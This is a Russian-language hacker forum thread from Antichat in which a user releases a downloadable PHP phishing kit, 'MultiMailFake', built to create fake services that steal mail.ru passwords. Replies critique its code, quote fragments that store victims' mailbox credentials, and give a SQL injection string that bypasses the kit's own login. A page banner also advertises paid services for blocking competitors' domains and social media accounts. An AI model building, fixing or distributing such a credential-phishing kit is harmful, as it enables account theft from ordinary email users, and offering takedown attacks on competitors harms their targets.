Форум АНТИЧАТ - [MMF]

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
[MMF] - MultiMailFake

Опции темы

Поиск в этой теме

Опции просмотра

[MMF] - MultiMailFake

16.01.2010, 09:03

ReduKToR

Постоянный

Регистрация: 05.01.2009

Сообщений: 684

Провел на форуме:
3281634

Репутация: 485

Отправить сообщение для ReduKToR с помощью ICQ

[MMF] - MultiMailFake

[MMF] 0.2

MMF - MultiMailFake.Скрипт служит,для создания Фейк сервисов,для кражи паролей от mail.ru\аналогов.

Возможности:
[+] -Регистрация пользователей\Личный кабинет(мульти режим)
[+] -Отправка Письма жертве прям из скрипта.(со втроенным примером)
[+] -Отправка отчетов пользователю на email(по желанию)
[+] -++ Изменен интерфейс.Местами переписан.

Вообщем пока, что скрипт простоват,но работает вполне отлично.
Писал для своего будущего сервиса,но потом желание пропало,да и дел по мимо него много.
А так как я за Опенсурс,то скрипты радушно выкладываю в паблик)

Код кривоват,но работает....
Просьба не писать комментарии,с текстом типа: а я бы сделал вот так ...
Так как мне ровно пофиг,как бы вы сделали.....

Скачать MMF 0.2

Последний раз редактировалось ReduKToR; 06.03.2010 в 10:02..

05.03.2010, 21:41

ReduKToR

Постоянный

Регистрация: 05.01.2009

Сообщений: 684

Провел на форуме:
3281634

Репутация: 485

Нашел 15 минут свободного времени.Дописал.
Обновил первый пост.

05.03.2010, 22:52

Постоянный

Регистрация: 05.12.2004

Сообщений: 647

Провел на форуме:
1698585

Репутация: 818

Отправить сообщение для b3 с помощью ICQ

Привыкли писать скрипты на error_reporting(0);

Код:

Notice: A session had already been started - ignoring session_start() in C:\wamp\www\1\regi.php on line 59

Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 63

Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 64

Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 65

Во вторых:

PHP код:


		
			
    $login = mysql_real_escape_string($_POST['login']);

    $password = $_POST['password'];



    $query = "SELECT `id` FROM `users` WHERE `login`='{$login}' AND `password`='{$password}' LIMIT 1";

Логин обезопасил а пароль ненадо? Ну тогда лови скуль:
Любой логин и пароль:

Код:

1' or 1='1

Авторизация проходит.

Если чесно, не в обиду, скрипт УГ)))) После скули дальнейший код не смотрел, интерес пропал.

06.03.2010, 10:04

ReduKToR

Постоянный

Регистрация: 05.01.2009

Сообщений: 684

Провел на форуме:
3281634

Репутация: 485

Дебагнул...

Цитата:

Сообщение от b3

Если чесно, не в обиду, скрипт УГ))))

Ну давай напиши лучще... Где от тебя хоть один норм релиз?
только вечно и умеешь что обсирать.....

06.03.2010, 12:07

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

1. Запросы = queries на английском. Базовые знания английского

2. Пути статические. Например, я кинул скрипт в папку MMF, а после cмены настроек, например, редирект идет на /logi.php. Так же и с формой фейка.
3.

PHP код:


		
			
    if (@$_GET['mod'] !== "logi" && @$_GET['mod'] !== "mail" && @$_GET['mod'] !== "test" && @

        $_GET['mod'] !== "sett" && @$_GET['mod'] !== "delete" && @$_GET['mod'] !== "exit")

in_array ф-цию не просто так придумали

PHP код:


		
			
!preg_match("/^[\d]+$/i",

        $_GET['page'])

is_numeric - намного проще, быстрее, удобнее, легче.
5.

PHP код:


		
			
$vuvod

$primer

Никогда еще не видел кода с переменными на транслите русского языка.

06.03.2010, 12:18

Gaus

Участник форума

Регистрация: 08.02.2009

Сообщений: 196

Провел на форуме:
1420275

Репутация: 127

Цитата:

Сообщение от mailbrush

Никогда еще не видел кода с переменными на транслите русского языка.

в большинсте пхп скриптах такое можно увидеть

06.03.2010, 15:41

Deathdreams

Постоянный

Регистрация: 08.11.2008

Сообщений: 498

Провел на форуме:
2603363

Репутация: 278

Отправить сообщение для Deathdreams с помощью ICQ

mailbrush
я думаю нет смысла критиковать названия переменных, т.к. релиз бесплатный и выложен для того, чтобы исправить код, помочь.

имена переменный каждый задает так, как ему удобно.

есть смысл их критиковать, если скрипт выполнен на заказ, хотя ТСу ещё далеко для выполнения заказов.

06.03.2010, 16:07

Постоянный

Регистрация: 05.12.2004

Сообщений: 647

Провел на форуме:
1698585

Репутация: 818

Цитата:

Ну давай напиши лучще... Где от тебя хоть один норм релиз?
только вечно и умеешь что обсирать.....

Мальчик не выёбуйся, когда тебе указывают на ошибки, а учись выслушать и вынести с этого пользу. Я не стал писать что ты быдла кодер, я сказал что идея скрипта УГ, но судя по всему и ты тоже Г... раз неможеш адекватно воспринять критику, держы быдлан:

файл regi.php:

PHP код:


		
			
session_start();

Раскрытие путей через точку в сессии , исправление:

PHP код:


		
			
@session_start();

Нет проверки на занятость ника при регистрации:

Потому что быдло код:

PHP код:


		
			
$ch_login = strtolower($login);

        $pass = $pass;





        $sql = @mysql_query("SELECT * FROM `users` WHERE `login` = '".$ch_login."'");

        if(mysql_num_rows($sql) > 0)

        {

            echo'Аккуант с таким логином уже зарегистрирован!<br /><br />';

        }

Неработает, догадайся почему.

PHP код:


		
			
        elseif($email and !preg_match("#^[_\.0-9a-z-]+@([0-9a-z][0-9a-z-]+\.)+[a-z]{2,6}$#", $email))

        {

            echo'Неверный формат email!<br /><br />';

        }

Зачем ты делаеш конкатенацию строк, если используеш двойные ковычки?

PHP код:


		
			
mysql_query("INSERT INTO `$db_name`.`users` (`login` ,`password` ,`email`) VALUES ('".$_POST['login']."', '".$_POST['pass']."', '".$_POST['email']."');");

ЗЫ Ты юморист

PHP код:


		
			
$pass = $pass;

Index.php

Скуль не закрыта:

PHP код:


		
			
    $login = mysql_real_escape_string($_POST['login']);

    $password = $_POST['password'];



    $query = "SELECT `id` FROM `users` WHERE `login`='{$login}' AND `password`='{$password}' LIMIT 1";

Конструкция:

PHP код:


		
			
           $query = mysql_query("SELECT * FROM `users` ORDER BY `id` ASC");

        $vsego = mysql_num_rows($query);

        echo'<td class=border>Пользователей:'.$vsego.'</td><br>';

        

        $query = mysql_query("SELECT * FROM `querys` ORDER BY `id` ASC");

        $vsego = mysql_num_rows($query);

        echo'<td class=border>Записей:'.$vsego.'</td>';

4 запросса!!! Хотя можно было бы:

Код:

SELECT count(*) FROM users UNION SELECT count(*) FROM querys;

Регулярки ето клёво, но не до такой степени:

PHP код:


		
			
       if ( !isset($_GET['page']) or empty($_GET['page'])

          or $_GET['page'] < 0  or !preg_match("/^[\d]+$/i",$_GET['page']) )

          $show = 0;

Кстати /^[\d]+$/i модификатор i жжот в проверке на число.

Воощем в итоге я запутался в твоей писанине, непонятно зачем ты продублировал регистрацию еще и в файле logi.php

Вот еще гавнокод без проверок, делай что хочеш, просто мего сервис по тренировке хацкеров.

PHP код:


		
			
$query = "INSERT INTO querys(user, time, query, referer, ip, user_agent, maillogin, mailpass)

VALUES('".$login1."','".$time."','".$in_ip."','".$reftext."','".$ip."','".$otherinf."','".$login."','".$password."')";

mysql_query($query);

Вот ета часть кода у меня не заработала:

PHP код:


		
			
if{$row['mail_status'] = 1}{

Я заменил на

PHP код:


		
			
if($row['mail_status'] = 1){

если ты не против.

Далее:

PHP код:


		
			
$mail = strtr($mail);

Код:

Warning: strtr() expects at least 2 parameters, 1 given in C:\wamp\www\1\auth.php on line 42

И вот что-то сфейлил:

Код:

Fatal error: Call to undefined function mailenc() in C:\wamp\www\1\auth.php on line 43

Там еще файл какой-то пытался скрипт открыть, но не нашел его:

PHP код:


		
			
$maillist = file("baza.txt");

Че за файл? Ридми нету, телепаты в отпуске.

Вообщем сил больше нету, в этом "коде" можно коментировать практически каждую 2-ю строку "кода".

Цитата:

Ну давай напиши лучще... Где от тебя хоть один норм релиз?
только вечно и умеешь что обсирать.....

Во-первых мне некогда писать подобные релизы, хотя я бы писал с удовольствием, но у меня нет времени, мне приходится работать, т.к. возраст 24 года. Во-вторых ты не видел все мои релизы, поетому не тебе судить. В третих я не обсираю, я указываю на ошибки, если ты в каждом критикуюшем видеш патенциального врага ето твои проблемы/комплексы.

06.03.2010, 16:12

Deathdreams

Постоянный

Регистрация: 08.11.2008

Сообщений: 498

Провел на форуме:
2603363

Репутация: 278

b3, хороший анализ. В дополнениях не нужнается, т.к. действительно, слишком кривой код.

Исправь:

Цитата:

Я заменил на

if($row['mail_status'] == 1){

Последний раз редактировалось Deathdreams; 06.03.2010 в 16:15..

#10

06.03.2010, 16:35

ReduKToR

Постоянный

Регистрация: 05.01.2009

Сообщений: 684

Провел на форуме:
3281634

Репутация: 485

и так что мы имеем.
Из всего выше описаного я нашел толлько 1 неработающую хрень с опправкой отчетов на мыло, это то что я забыл поставить =
а остальное мое желание и мелкие недоделки.

вообщем разработка всеравно заморожена.кому нужно будет - доделает.

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход